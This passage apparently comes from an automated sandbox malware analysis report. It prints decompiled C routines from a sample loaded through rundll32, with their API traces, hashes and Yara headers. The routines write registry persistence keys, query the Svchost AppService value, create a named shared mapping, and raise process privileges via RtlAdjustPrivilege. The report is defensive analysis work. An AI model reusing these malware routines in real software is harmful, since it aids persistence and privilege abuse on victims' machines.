                                                              • Part of subcall function 0464ABF0: FreeSid.ADVAPI32(?), ref: 0464AC4A
                                                            • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020119,0464B6FC,?,04686318,?,?,0464B6FC), ref: 04636360
                                                            • RegCloseKey.ADVAPI32(0464B6FC,?,04686318,?,?,0464B6FC), ref: 0463636D
                                                              • Part of subcall function 04646C70: wsprintfW.USER32 ref: 04646CB8
                                                              • Part of subcall function 04646C70: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04646CF5
                                                              • Part of subcall function 04646C70: RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,?,?), ref: 04646D20
                                                              • Part of subcall function 04646C70: RegCloseKey.ADVAPI32(?), ref: 04646D36
                                                              • Part of subcall function 04646B70: wsprintfW.USER32 ref: 04646BB5
                                                              • Part of subcall function 04646B70: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04646BF2
                                                              • Part of subcall function 04646B70: RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,?,?), ref: 04646C1D
                                                              • Part of subcall function 04646B70: RegCloseKey.ADVAPI32(?), ref: 04646C33
                                                            • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Classes\.codein,00000000,00020119,?,?,04686318,?,?,0464B6FC), ref: 04636396
                                                            • RegCloseKey.ADVAPI32(?,?,04686318,?,?,0464B6FC), ref: 046363A3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpen$QueryValuewsprintf$AllocateCheckFreeInitializeMembershipToken
                                                            • String ID: SOFTWARE\Classes\.codein
                                                            • API String ID: 2055797972-3041101089
                                                            • Opcode ID: d0401561727522b634a020f782359e65b1d59bb76286e0924daf4d308c9dec07
                                                            • Instruction ID: 873ab7f46cebf3d3f200fb3a6037ea32fa68334a76268577233c0290ceec52a4
                                                            • Opcode Fuzzy Hash: d0401561727522b634a020f782359e65b1d59bb76286e0924daf4d308c9dec07
                                                            • Instruction Fuzzy Hash: 2631F570600344ABEB209F64DD49B65B7E8FF44309F10226DED46D7251FB75BC508795
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 84%
                                                            			E046378B0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				char _v616;
                                                            				signed int _t15;
                                                            				void* _t45;
                                                            				signed int _t48;
                                                            
                                                            				_t15 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t15 ^ _t48;
                                                            				_t45 = __edx;
                                                            				_push(__edi);
                                                            				E04646050(__ebx, __ecx,  &_v88, __edi, __edx);
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				_t5 = _t45 + 0x13c; // 0x13c
                                                            				_v616 = _t5;
                                                            				_v612 = 0;
                                                            				if(RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0) != 0) {
                                                            					L3:
                                                            					return E04655AFE(_v8 ^ _t48);
                                                            				} else {
                                                            					RegSetValueExW(_v612, "1", 0, 4,  &_v616, 4);
                                                            					_t47 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v612);
                                                            					_t54 =  ==  ? 1 : 0;
                                                            					if(( ==  ? 1 : 0) == 0) {
                                                            						goto L3;
                                                            					} else {
                                                            						return E04655AFE(_v8 ^ _t48);
                                                            					}
                                                            				}
                                                            			}











                                                            0x046378b9
                                                            0x046378c0
                                                            0x046378c4
                                                            0x046378c9
                                                            0x046378ca
                                                            0x046378df
                                                            0x046378e8
                                                            0x046378f0
                                                            0x046378fc
                                                            0x04637921
                                                            0x0463796c
                                                            0x0463797d
                                                            0x04637923
                                                            0x0463793a
                                                            0x0463794d
                                                            0x04637950
                                                            0x04637956
                                                            0x04637958
                                                            0x00000000
                                                            0x0463795a
                                                            0x0463796b
                                                            0x0463796b
                                                            0x04637958

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 046378DF
                                                            • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04637919
                                                            • RegSetValueExW.ADVAPI32(?,0467E09C,00000000,00000004,?,00000004), ref: 0463793A
                                                            • RegCloseKey.ADVAPI32(?), ref: 04637950
                                                            Strings
                                                            • SOFTWARE\Classes\CLSID\%s, xrefs: 046378D9
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseValue$CreateOpenQuerywsprintf
                                                            • String ID: SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 73588525-1183003970
                                                            • Opcode ID: f5975b5c82b2a21cb0a63c8f095aeb5c3f5ebaf1f2f9308336a9cea966bb0d22
                                                            • Instruction ID: 2987b520876934b0e82582075f564d8d1a0d19bc9ac40e77645a67d6dfe8599f
                                                            • Opcode Fuzzy Hash: f5975b5c82b2a21cb0a63c8f095aeb5c3f5ebaf1f2f9308336a9cea966bb0d22
                                                            • Instruction Fuzzy Hash: 65119371A05228ABDB20DFA5DC48BEFBBBCEF45711F0001A9A90AE6140F6356E04DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 046422B8
                                                            • MonitorFromWindow.USER32(00000000,00000002), ref: 046422C1
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 046422D5
                                                            • EnumDisplaySettingsW.USER32(?), ref: 046422FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MonitorWindow$DesktopDisplayEnumFromInfoSettings
                                                            • String ID: h
                                                            • API String ID: 1862586070-2439710439
                                                            • Opcode ID: 3e4a15ee4af2bfada6c91a635c207ee163b8d16f8813a568f62ac00ff773ba00
                                                            • Instruction ID: 6d89972ac4da7c5fd87c69240ce25d55438a65f7542a7b69ffbf54e0f02637e2
                                                            • Opcode Fuzzy Hash: 3e4a15ee4af2bfada6c91a635c207ee163b8d16f8813a568f62ac00ff773ba00
                                                            • Instruction Fuzzy Hash: 5D21D1316047419FDB24DF74D889A9AF3E8FF88365F00471EE85997241EB30A859CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0464A1E0(char* __ecx, int* __edx) {
                                                            				void* _v8;
                                                            				int _v12;
                                                            				void* __edi;
                                                            				char* _t21;
                                                            				int* _t22;
                                                            
                                                            				_t22 = __edx;
                                                            				_t21 = __ecx;
                                                            				E0465DEA0(__ecx, __ecx, 0,  *((intOrPtr*)(__edx)));
                                                            				E0465DEA0(_t21, _t21, 0,  *_t22);
                                                            				_v8 = 0;
                                                            				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", 0, 0x20019,  &_v8) != 0) {
                                                            					L3:
                                                            					E0465DEA0(_t21, _t21, 0,  *_t22);
                                                            					 *_t22 = 0;
                                                            					return 0;
                                                            				} else {
                                                            					RegQueryValueExW(_v8, L"AppService", 0,  &_v12, _t21, _t22);
                                                            					_t17 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v8);
                                                            					_t28 =  ==  ? 1 : 0;
                                                            					if(( ==  ? 1 : 0) == 0) {
                                                            						goto L3;
                                                            					} else {
                                                            						return 1;
                                                            					}
                                                            				}
                                                            			}








                                                            0x0464a1e8
                                                            0x0464a1eb
                                                            0x0464a1f2
                                                            0x0464a1fd
                                                            0x0464a205
                                                            0x0464a224
                                                            0x0464a25e
                                                            0x0464a263
                                                            0x0464a26b
                                                            0x0464a279
                                                            0x0464a226
                                                            0x0464a235
                                                            0x0464a245
                                                            0x0464a248
                                                            0x0464a24e
                                                            0x0464a250
                                                            0x00000000
                                                            0x0464a254
                                                            0x0464a25d
                                                            0x0464a25d
                                                            0x0464a250

                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00020019,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0464A21C
                                                            • RegQueryValueExW.ADVAPI32(00000000,AppService,00000000,00000000,?,00000104,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0464A235
                                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0464A248
                                                            Strings
                                                            • AppService, xrefs: 0464A22D
                                                            • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 0464A212
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: AppService$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
                                                            • API String ID: 3677997916-1367592619
                                                            • Opcode ID: 9877785f57be5e95cab9cd94e1c792d632596a6f7b753a7017824dbdd33b4edc
                                                            • Instruction ID: 26bd7a28a9cbdf30af0e1c3b319606b4d93c9809dbf086456711d27c29fbfb2b
                                                            • Opcode Fuzzy Hash: 9877785f57be5e95cab9cd94e1c792d632596a6f7b753a7017824dbdd33b4edc
                                                            • Instruction Fuzzy Hash: 2D01D672740208BFFB216EE4AC89FBAB7BDEF94615F10007EFD08D1141FA625D5056A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0463B560(void* __eflags) {
                                                            				char _v24;
                                                            				long _v28;
                                                            				char* _v32;
                                                            				char _v36;
                                                            				void* _v40;
                                                            				intOrPtr _v44;
                                                            				void* __ebx;
                                                            				void* _t13;
                                                            				void* _t14;
                                                            				void* _t18;
                                                            				void* _t19;
                                                            				void* _t20;
                                                            				void* _t24;
                                                            				void* _t25;
                                                            
                                                            				_t11 =  &_v24;
                                                            				_v44 = 0x467e898;
                                                            				_v40 = 0;
                                                            				_v36 = 0xc;
                                                            				_v32 =  &_v24;
                                                            				_v28 = 0;
                                                            				_v40 = E0463AE60(_t19, _t24, _t25, _t11);
                                                            				_t22 =  ==  ? 0 :  &_v36;
                                                            				_t13 = CreateFileMappingW(0xffffffff,  ==  ? 0 :  &_v36, 4, 0, 0xd18, L"_kasssperskdy");
                                                            				 *0x4687ad8 = _t13;
                                                            				if(_t13 == 0) {
                                                            					L3:
                                                            					_t20 = 0;
                                                            				} else {
                                                            					_t18 = MapViewOfFile(_t13, 6, 0, 0, 0);
                                                            					 *0x4687adc = _t18;
                                                            					if(_t18 == 0) {
                                                            						goto L3;
                                                            					} else {
                                                            						_t20 = 1;
                                                            					}
                                                            				}
                                                            				_t14 = _v40;
                                                            				_v44 = 0x467e898;
                                                            				if(_t14 != 0) {
                                                            					HeapFree(GetProcessHeap(), 0, _t14);
                                                            				}
                                                            				return _t20;
                                                            			}

















                                                            0x0463b566
                                                            0x0463b569
                                                            0x0463b572
                                                            0x0463b579
                                                            0x0463b580
                                                            0x0463b583
                                                            0x0463b59b
                                                            0x0463b5a6
                                                            0x0463b5ac
                                                            0x0463b5b2
                                                            0x0463b5b9
                                                            0x0463b5d7
                                                            0x0463b5d7
                                                            0x0463b5bb
                                                            0x0463b5c4
                                                            0x0463b5ca
                                                            0x0463b5d1
                                                            0x00000000
                                                            0x0463b5d3
                                                            0x0463b5d3
                                                            0x0463b5d3
                                                            0x0463b5d1
                                                            0x0463b5d9
                                                            0x0463b5dc
                                                            0x0463b5e5
                                                            0x0463b5f1
                                                            0x0463b5f1
                                                            0x0463b5fd

                                                            APIs
                                                              • Part of subcall function 0463AE60: InitializeSecurityDescriptor.ADVAPI32(0463B60D,00000001,74D0F560,74CB6490), ref: 0463AE8F
                                                              • Part of subcall function 0463AE60: AllocateAndInitializeSid.ADVAPI32(0463B58F,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0463AEAB
                                                              • Part of subcall function 0463AE60: GetLengthSid.ADVAPI32(00000000,74CB6620), ref: 0463AEB9
                                                              • Part of subcall function 0463AE60: GetProcessHeap.KERNEL32(00000008,00000010), ref: 0463AEC5
                                                              • Part of subcall function 0463AE60: RtlAllocateHeap.NTDLL(00000000), ref: 0463AECC
                                                              • Part of subcall function 0463AE60: InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 0463AEDC
                                                              • Part of subcall function 0463AE60: AddAccessAllowedAce.ADVAPI32(00000000,00000002,10000000,00000000), ref: 0463AEF1
                                                              • Part of subcall function 0463AE60: SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 0463AF02
                                                              • Part of subcall function 0463AE60: FreeSid.ADVAPI32(00000000), ref: 0463AF1B
                                                              • Part of subcall function 0463AE60: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0463AF2B
                                                              • Part of subcall function 0463AE60: HeapFree.KERNEL32(00000000), ref: 0463AF32
                                                            • CreateFileMappingW.KERNEL32(000000FF,0000000C,00000004,00000000,00000D18,_kasssperskdy,0463B60D,74CB6620), ref: 0463B5AC
                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0463B5C4
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0463B5EA
                                                            • HeapFree.KERNEL32(00000000), ref: 0463B5F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$FreeInitializeProcess$AllocateDescriptorFileSecurity$AccessAllowedCreateDaclLengthMappingView
                                                            • String ID: _kasssperskdy
                                                            • API String ID: 1566987605-1033421605
                                                            • Opcode ID: 30afa07b4c04164154c56e4b140461db54ab6b640bfd0d00dc8e23cbda63f4d1
                                                            • Instruction ID: 26d4e80adf076d5bc29753f5425ba0dded7aa6886ed97276a7bcdc384a9938c9
                                                            • Opcode Fuzzy Hash: 30afa07b4c04164154c56e4b140461db54ab6b640bfd0d00dc8e23cbda63f4d1
                                                            • Instruction Fuzzy Hash: E41165B0A40349AEEB10DFA5DC49BBE7BF8EB18711F241119E905B62C0FB75AD048B75
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E0464ADD0(WCHAR* __ecx, void* __esi) {
                                                            				signed int _v8;
                                                            				intOrPtr _v12;
                                                            				WCHAR* _v16;
                                                            				struct _PRIVILEGE_SET _v28;
                                                            				int _v32;
                                                            				void* _v36;
                                                            				struct _LUID _v44;
                                                            				signed int _t21;
                                                            				WCHAR* _t39;
                                                            				signed int _t40;
                                                            
                                                            				_t21 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t21 ^ _t40;
                                                            				_v44.LowPart = 0;
                                                            				asm("xorps xmm0, xmm0");
                                                            				_v44.HighPart = 0;
                                                            				_t39 = __ecx;
                                                            				_v28.PrivilegeCount = 0;
                                                            				asm("movups [ebp-0x14], xmm0");
                                                            				_v32 = 0;
                                                            				_v36 = 0;
                                                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v36) != 0) {
                                                            					LookupPrivilegeValueW(0, _t39,  &_v44);
                                                            					_v28.Privilege = _v44.LowPart;
                                                            					_v16 = _v44.HighPart;
                                                            					_v28.Control = 1;
                                                            					_v28.PrivilegeCount = 1;
                                                            					_v12 = 2;
                                                            					PrivilegeCheck(_v36,  &_v28,  &_v32);
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t40);
                                                            			}













                                                            0x0464add6
                                                            0x0464addd
                                                            0x0464ade4
                                                            0x0464adec
                                                            0x0464adef
                                                            0x0464adf8
                                                            0x0464adfa
                                                            0x0464ae01
                                                            0x0464ae05
                                                            0x0464ae0c
                                                            0x0464ae22
                                                            0x0464ae2b
                                                            0x0464ae34
                                                            0x0464ae3a
                                                            0x0464ae44
                                                            0x0464ae4f
                                                            0x0464ae56
                                                            0x0464ae5d
                                                            0x0464ae5d
                                                            0x0464ae74

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 0464AE13
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0464AE1A
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,00000000), ref: 0464AE2B
                                                            • PrivilegeCheck.ADVAPI32(00000000,00000000,00000000), ref: 0464AE5D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: PrivilegeProcess$CheckCurrentLookupOpenTokenValue
                                                            • String ID: SeTcbPrivilege
                                                            • API String ID: 3991982149-1502394177
                                                            • Opcode ID: 63f7a8a7a4ab260870a55024c5caa2dca862611b0b18182305db1be0a97797d8
                                                            • Instruction ID: fba1e486256413da8b4b373c7d516d6b2806e52ebbde8f289b7325d080911006
                                                            • Opcode Fuzzy Hash: 63f7a8a7a4ab260870a55024c5caa2dca862611b0b18182305db1be0a97797d8
                                                            • Instruction Fuzzy Hash: 9211F8B1D0020D9BDB00CF94D888BEEBBF8FF08314F105159E905B2240EBB96A448FA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04632500(void* __ecx) {
                                                            				void* _t7;
                                                            				void* _t8;
                                                            				struct HWND__* _t9;
                                                            				struct HWND__* _t13;
                                                            				void* _t16;
                                                            
                                                            				_t16 = __ecx;
                                                            				_t7 = CreateEventW(0, 0, 0, 0);
                                                            				 *(_t16 + 0xc0) = _t7;
                                                            				if(_t7 == 0) {
                                                            					L3:
                                                            					_t8 =  *(_t16 + 0xc0);
                                                            					if(_t8 != 0) {
                                                            						CloseHandle(_t8);
                                                            						 *(_t16 + 0xc0) = 0;
                                                            					}
                                                            					_t9 =  *(_t16 + 0xc4);
                                                            					if(_t9 != 0) {
                                                            						CloseWindow(_t9);
                                                            						 *(_t16 + 0xc4) = 0;
                                                            					}
                                                            					return 0;
                                                            				} else {
                                                            					_t13 = CreateWindowExA(0, "#32770", 0x467d888, 0x80000000, 0, 0, 0, 0, 0, 0, 0, 0);
                                                            					 *(_t16 + 0xc4) = _t13;
                                                            					if(_t13 == 0) {
                                                            						goto L3;
                                                            					} else {
                                                            						return 1;
                                                            					}
                                                            				}
                                                            			}








                                                            0x04632509
                                                            0x0463250b
                                                            0x04632511
                                                            0x04632519
                                                            0x04632553
                                                            0x04632553
                                                            0x0463255b
                                                            0x0463255e
                                                            0x04632564
                                                            0x04632564
                                                            0x0463256e
                                                            0x04632576
                                                            0x04632579
                                                            0x0463257f
                                                            0x0463257f
                                                            0x0463258c
                                                            0x0463251b
                                                            0x0463253c
                                                            0x04632542
                                                            0x0463254a
                                                            0x00000000
                                                            0x0463254c
                                                            0x04632552
                                                            0x04632552
                                                            0x0463254a

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,04648072), ref: 0463250B
                                                            • CreateWindowExA.USER32(00000000,#32770,0467D888,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0463253C
                                                            • CloseHandle.KERNEL32(?), ref: 0463255E
                                                            • CloseWindow.USER32(?), ref: 04632579
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCreateWindow$EventHandle
                                                            • String ID: #32770
                                                            • API String ID: 1958951703-463685578
                                                            • Opcode ID: c34b5ddedb5e50d8a06fe739ff1c5027d90d453cb17e1d4c35864d3eed76ee18
                                                            • Instruction ID: 056798f22117f4bb48d690e0e69abbb1df6da33bbf9381d3163ade7d4ac02615
                                                            • Opcode Fuzzy Hash: c34b5ddedb5e50d8a06fe739ff1c5027d90d453cb17e1d4c35864d3eed76ee18
                                                            • Instruction Fuzzy Hash: 13F0E730381701ABF7349B35AC29F8676E4EB10722F100A59F51AE72C0EBB8E9008A50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 15%
                                                            			E0463D360(intOrPtr* __ecx, char _a4) {
                                                            				void* __esi;
                                                            				char _t9;
                                                            				_Unknown_base(*)()* _t12;
                                                            				char* _t18;
                                                            				intOrPtr* _t20;
                                                            
                                                            				_t18 = __ecx;
                                                            				_t9 = _a4;
                                                            				_t20 = __ecx;
                                                            				 *__ecx = 0x467e8b0;
                                                            				 *((intOrPtr*)(__ecx + 4)) = _t9;
                                                            				 *((intOrPtr*)(_t9 + 0x38)) = __ecx;
                                                            				 *((intOrPtr*)(_t20 + 8)) = CreateEventW(0, 1, 0, 0);
                                                            				 *_t20 = 0x467e97c;
                                                            				_t12 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlAdjustPrivilege");
                                                            				if(_t12 == 0) {
                                                            					E0464AD30(_t20);
                                                            				} else {
                                                            					_t18 =  &_a4;
                                                            					 *_t12(0x14, 1, 0, _t18);
                                                            				}
                                                            				_push(_t18);
                                                            				_push(0x3f);
                                                            				_push(1);
                                                            				_push( &_a4);
                                                            				_a4 = 0x8d;
                                                            				E04631C60( *((intOrPtr*)(_t20 + 4)));
                                                            				return _t20;
                                                            			}








                                                            0x0463d360
                                                            0x0463d363
                                                            0x0463d369
                                                            0x0463d371
                                                            0x0463d377
                                                            0x0463d37a
                                                            0x0463d388
                                                            0x0463d38b
                                                            0x0463d39d
                                                            0x0463d3a5
                                                            0x0463d3b5
                                                            0x0463d3a7
                                                            0x0463d3a7
                                                            0x0463d3b1
                                                            0x0463d3b1
                                                            0x0463d3ba
                                                            0x0463d3c1
                                                            0x0463d3c3
                                                            0x0463d3c5
                                                            0x0463d3c6
                                                            0x0463d3ca
                                                            0x0463d3d3

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0463922C,?,046878D8,00000000), ref: 0463D37D
                                                            • LoadLibraryA.KERNEL32(ntdll.dll,?,?,0463922C,?,046878D8,00000000), ref: 0463D391
                                                            • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 0463D39D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressCreateEventLibraryLoadProc
                                                            • String ID: RtlAdjustPrivilege$ntdll.dll
                                                            • API String ID: 3086787778-64178277
                                                            • Opcode ID: 556a37c1bd1f39e5c1018277be13a2d330f36b4d5e2f4e143890b40e9f678b3c
                                                            • Instruction ID: 3a2f95e013d036d2b775009b43accc2cfa9be6dd33ce559664cce26f06906ebb
                                                            • Opcode Fuzzy Hash: 556a37c1bd1f39e5c1018277be13a2d330f36b4d5e2f4e143890b40e9f678b3c
                                                            • Instruction Fuzzy Hash: B4016271380705BFE7249FA4DC4AF967A94EF18B51F00441DF2599A1C0FAB4B540C7A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0465F3B5,?,?,0465F355,?,04681730,0000000C,0465F488,00000000,00000000), ref: 0465F424
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0465F437
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0465F3B5,?,?,0465F355,?,04681730,0000000C,0465F488,00000000,00000000,00000001,0465625B), ref: 0465F45A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: c0d23720ea4ae0543b5c62f7bb331aca26250a3d704d39c6929595df641fecf2
                                                            • Instruction ID: 0ec2ca854fc385f1de3537753f70851c1dbcbf4cca0a6276fb4e62f0ece68844
                                                            • Opcode Fuzzy Hash: c0d23720ea4ae0543b5c62f7bb331aca26250a3d704d39c6929595df641fecf2
                                                            • Instruction Fuzzy Hash: CDF0443560021DBBCB159F95D84DBADBBB4EF44715F004158F809A2251FF746D44CA95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0464D020: StrChrW.SHLWAPI(?,0000003A), ref: 0464D044
                                                            • WSASetLastError.WS2_32(0000273F,?,?), ref: 0464EFD6
                                                              • Part of subcall function 0464D0D0: WSASetLastError.WS2_32(00002741), ref: 0464D0FA
                                                            • socket.WS2_32(00000000,00000001,00000006), ref: 0464EFF9
                                                            • WSAIoctl.WS2_32(00000000,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 0464F043
                                                            • WSAGetLastError.WS2_32 ref: 0464F04E
                                                            • WSACreateEvent.WS2_32 ref: 0464F06E
                                                              • Part of subcall function 04637AC0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 04637ADE
                                                              • Part of subcall function 04637AC0: RtlEnterCriticalSection.NTDLL(?), ref: 0464FA53
                                                              • Part of subcall function 04637AC0: RtlLeaveCriticalSection.NTDLL(?), ref: 0464FA7B
                                                              • Part of subcall function 04637AC0: SetLastError.KERNEL32(0000139F,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 0464FA87
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$CriticalSection$CreateEnterEventExceptionIoctlLeaveRaisesocket
                                                            • String ID:
                                                            • API String ID: 688454317-0
                                                            • Opcode ID: b5b2c7d4cf02fd5ab1aa5e9843c7339788d7cd95dadbb25aec7ad150944cbec9
                                                            • Instruction ID: 17f4c7526389cd006db7b30fb1e849447802673e02fd50b2d598c942c66ca98b
                                                            • Opcode Fuzzy Hash: b5b2c7d4cf02fd5ab1aa5e9843c7339788d7cd95dadbb25aec7ad150944cbec9
                                                            • Instruction Fuzzy Hash: A141B175A00209ABEF24DF64E880BAE77A5EFC4714F10412EEA06D7381FB75B941CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E04642760(void* __ecx, void* __esi, int* _a4) {
                                                            				struct tagPOINT _v12;
                                                            				void* __ebx;
